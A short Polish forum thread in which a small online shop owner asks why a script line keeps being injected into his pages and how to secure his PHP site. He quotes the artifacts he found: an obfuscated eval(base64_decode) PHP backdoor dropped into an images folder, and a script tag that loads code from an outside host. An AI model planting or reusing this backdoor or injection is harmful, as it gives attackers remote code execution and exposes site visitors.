 [XML][CSS][PHP]Zagrożenie |
  |
| [XML][CSS][PHP]Zagrożenie |
Post
#1
|
|
 Grupa: Zarejestrowani Postów: 733 Pomógł: 4 Dołączył: 11.11.2009 Ostrzeżenie: (0%) 
 |
Witam.
Otóż mam problem. Posiadam stronę www. Taki mini sklep z e-bookami. Problem polega na tym, że najwidoczniej nie jest odpowiednio bezpieczny, ponieważ codziennie wchodząc na stronę i zaglądając w źródło strony dodaje się niespodziewana linijka. Treści teraz nie podam, ale zaczyna się od <script>. Pytania brzmią: 1. Dlaczego taka linijka się sama dodaje. 2. Jak zabezpieczyć kod php i mysql. 3. Słyszałem gdzieś, że to wina CHMOD'ów. Jakie ustawić dla danego pliku: Kod FOLDER GŁÓWNY: index.php style.css IMAGES obrazek1.png obrazek2.png obrazek3.png PANEL plik1.php plik2.php plik3.php plik4.php plik5.php . . .itp STRONA LICZNIK-licznik.txt plik1.php plik2.php plik3.php plik4.php plik5.php . . .itp LEGENDA: NAPISANE DRUKOWANYMI LITERAMI=folder napisane małymi literami=plik z rozszeżeniem(.php, .css, .txt) Proszę o pomoc  Z góry dziękuje. Chciałbym dodać, że dodatkowo w folderze images tworzy się plik o nazwie gifimg.php o treści: Kod <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vs c2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> W pliku index wstawia się kod o treści: Kod <script src=http://brekisoftgames.extra.hu/e107_docs/forum_viewtopic.php ></script>
-------------------- |
 |
 
|
|
Post
#2
|
|
 Grupa: Zarejestrowani Postów: 1 575 Pomógł: 299 Dołączył: 26.03.2009 Ostrzeżenie: (20%) 
|
Używasz total commandera do przysyłania plików na serwer?
-------------------- |
|
|
|
|
Post
#3
|
|
 Grupa: Moderatorzy Postów: 2 921 Pomógł: 269 Dołączył: 11.08.2005 Skąd: 127.0.0.1 |
Temat poruszany na forum setki razy.
Zamykam. -------------------- I would love to change the world, but they won't give me the source code.
My software never has bugs. It just develops random features. |
|
|
|
|
|
Aktualny czas: 21.08.2025 - 23:34 |
